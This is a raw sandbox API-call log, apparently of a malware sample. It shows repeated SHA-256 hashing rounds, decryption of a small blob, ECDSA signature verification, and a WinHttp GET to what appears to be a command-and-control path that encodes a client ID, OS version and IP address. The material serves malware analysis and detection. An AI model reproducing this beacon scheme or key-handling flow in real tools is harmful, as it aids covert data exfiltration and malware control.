	[0118.567] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.567] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0118.567] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc9f0
	[0118.567] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc9f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc9f0, pdwDataLen=0x129364) returned 1
	[0118.567] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.567] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.567] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.567] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.567] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0118.567] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.568] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fca18, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fca18, pdwDataLen=0x129364) returned 1
	[0118.568] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.568] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.568] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.568] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.568] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0118.568] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.568] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fca40, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fca40, pdwDataLen=0x129364) returned 1
	[0118.568] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.568] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.568] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.568] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.568] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0118.569] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.569] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fca68, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fca68, pdwDataLen=0x129364) returned 1
	[0118.569] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.569] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.569] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.569] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.569] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0118.569] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.569] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fca90, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fca90, pdwDataLen=0x129364) returned 1
	[0118.569] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.569] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.569] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.570] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.570] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0118.570] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.570] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcab8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fcab8, pdwDataLen=0x129364) returned 1
	[0118.570] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.570] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.570] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.570] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.570] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0118.570] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.570] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcae0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fcae0, pdwDataLen=0x129364) returned 1
	[0118.570] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.570] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.570] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.571] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.571] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0118.571] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.571] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcb08, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fcb08, pdwDataLen=0x129364) returned 1
	[0118.571] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.571] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b6770) returned 1
	[0118.571] CryptAcquireContextW (in: phProv=0x129390, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129390*=0x225528) returned 1
	[0118.571] CryptImportKey (in: hProv=0x225528, pbData=0x129358, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x129398 | out: phKey=0x129398*=0x22b6600) returned 1
	[0118.571] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x4, pbData=0x129384*=0x1, dwFlags=0x0) returned 1
	[0118.571] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x1, pbData=0x22fcb08, dwFlags=0x0) returned 1
	[0118.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0) returned 0x227b320
	[0118.571] CryptDecrypt (in: hKey=0x22b6600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x227b320, pdwDataLen=0x12938c | out: pbData=0x227b320, pdwDataLen=0x12938c) returned 1
	[0118.571] CryptDestroyKey (hKey=0x22b6600) returned 1
	[0118.571] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.571] GetVersion () returned 0x1db10106
	[0118.571] CryptAcquireContextW (in: phProv=0x129298, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129298*=0x225528) returned 1
	[0118.572] CryptCreateHash (in: hProv=0x225528, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x12929c | out: phHash=0x12929c) returned 1
	[0118.572] CryptHashData (hHash=0x22b65c0, pbData=0x227b320, dwDataLen=0x34, dwFlags=0x0) returned 1
	[0118.572] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129294, pdwDataLen=0x129290, dwFlags=0x0 | out: pbData=0x129294, pdwDataLen=0x129290) returned 1
	[0118.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0118.572] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a5bd0, pdwDataLen=0x129294, dwFlags=0x0 | out: pbData=0x22a5bd0, pdwDataLen=0x129294) returned 1
	[0118.572] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.572] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.572] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x129398, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x129398) returned 0x0
	[0118.572] BCryptImportKeyPair (in: hAlgorithm=0x22ee0c8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1293a0, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1293a0) returned 0x0
	[0118.574] BCryptGetProperty (in: hObject=0x22ad9c0, pszProperty="SignatureLength", pbOutput=0x1293b8, cbOutput=0x4, pcbResult=0x129390, dwFlags=0x0 | out: pbOutput=0x1293b8, pcbResult=0x129390) returned 0x0
	[0118.575] BCryptVerifySignature (hKey=0x22ad9c0, pPaddingInfo=0x0, pbHash=0x22a5bd0, cbHash=0x30, pbSignature=0x227b354, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0118.577] BCryptDestroyKey (in: hKey=0x22ad9c0 | out: hKey=0x22ad9c0) returned 0x0
	[0118.577] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee0c8, dwFlags=0x0 | out: hAlgorithm=0x22ee0c8) returned 0x0
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fb708) returned 1
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fcb08) returned 1
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x227b320) returned 1
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad258
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x219cc0
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x26b6770
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad270
	[0118.577] CharLowerBuffA (in: lpsz="ssert", cchLength=0x5 | out: lpsz="ssert") returned 0x5
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad270) returned 1
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad270
	[0118.577] CharLowerBuffA (in: lpsz="expir", cchLength=0x5 | out: lpsz="expir") returned 0x5
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad270) returned 1
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad270
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0118.577] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x129408 | out: lpSystemTimeAsFileTime=0x129408*(dwLowDateTime=0x307bda60, dwHighDateTime=0x1d50a6a)) 
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c4dc0) returned 1
	[0118.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0118.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0118.577] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ba8 | out: lpSystemTimeAsFileTime=0x128ba8*(dwLowDateTime=0x307bda60, dwHighDateTime=0x1d50a6a)) 
	[0118.577] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0118.578] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0118.578] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/0/Windows 7 x86 SP1/1058/84.182.248.91/E8BC99265198FF1B122E2AA85B368523CB02BE18D865E27FA7C76B40094A3089/2If1Jg2IfxKgxGXp5Sj2/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0118.578] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bc0, dwBufferLength=0x4) returned 1
	[0118.578] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0118.960] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0118.960] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bb0, lpdwBufferLength=0x128bac, lpdwIndex=0x0 | out: lpBuffer=0x128bb0*, lpdwBufferLength=0x128bac*=0x4, lpdwIndex=0x0) returned 1
	[0118.960] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128bb4 | out: lpdwNumberOfBytesAvailable=0x128bb4*=0x383) returned 1
	[0118.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x390) returned 0x261e88
	[0118.961] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x261e88, dwNumberOfBytesToRead=0x383, lpdwNumberOfBytesRead=0x128bac | out: lpBuffer=0x261e88*, lpdwNumberOfBytesRead=0x128bac*=0x383) returned 1
	[0118.961] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128bb4 | out: lpdwNumberOfBytesAvailable=0x128bb4*=0x0) returned 1
	[0118.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x320) returned 0x22eb8e8
	[0118.961] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x261e88) returned 1
	[0118.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcb08
	[0118.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x26b7778
	[0118.961] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.962] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.962] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0118.962] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb708
	[0118.962] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb708, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fb708, pdwDataLen=0x12942c) returned 1
	[0118.962] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.962] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.962] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.963] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.963] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0118.963] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcb30
	[0118.963] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcb30, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcb30, pdwDataLen=0x12942c) returned 1
	[0118.963] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.963] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.963] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.963] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.963] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0118.963] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcb58
	[0118.963] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcb58, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcb58, pdwDataLen=0x12942c) returned 1
	[0118.964] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.964] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.964] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.964] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.964] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0118.964] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcb80
	[0118.964] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcb80, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcb80, pdwDataLen=0x12942c) returned 1
	[0118.964] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.964] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.964] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.965] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.965] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0118.965] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.965] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcba8
	[0118.965] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcba8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcba8, pdwDataLen=0x12942c) returned 1
	[0118.965] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.965] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.965] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.966] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.966] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0118.966] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.966] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcbd0
	[0118.966] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcbd0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcbd0, pdwDataLen=0x12942c) returned 1
	[0118.966] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.966] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.966] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.966] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.967] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0118.967] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcbf8
	[0118.967] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcbf8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcbf8, pdwDataLen=0x12942c) returned 1
	[0118.967] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.967] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.967] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.967] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.967] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0118.967] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcc20
	[0118.967] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcc20, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcc20, pdwDataLen=0x12942c) returned 1
	[0118.967] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.967] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.967] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.968] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.968] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0118.968] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcc48
	[0118.968] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcc48, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcc48, pdwDataLen=0x12942c) returned 1
	[0118.968] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.968] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.968] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.969] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.969] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0118.969] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.969] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcc70
	[0118.969] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fcc70, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcc70, pdwDataLen=0x12942c) returned 1
	[0118.969] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.969] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.969] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0118.969] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0118.970] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0118.970] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0118.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fcc98
	[0118.970] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fcc98, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fcc98, pdwDataLen=0x12942c) returned 1
	[0118.970] CryptDestroyHash (hHash=0x22b6600) returned 1
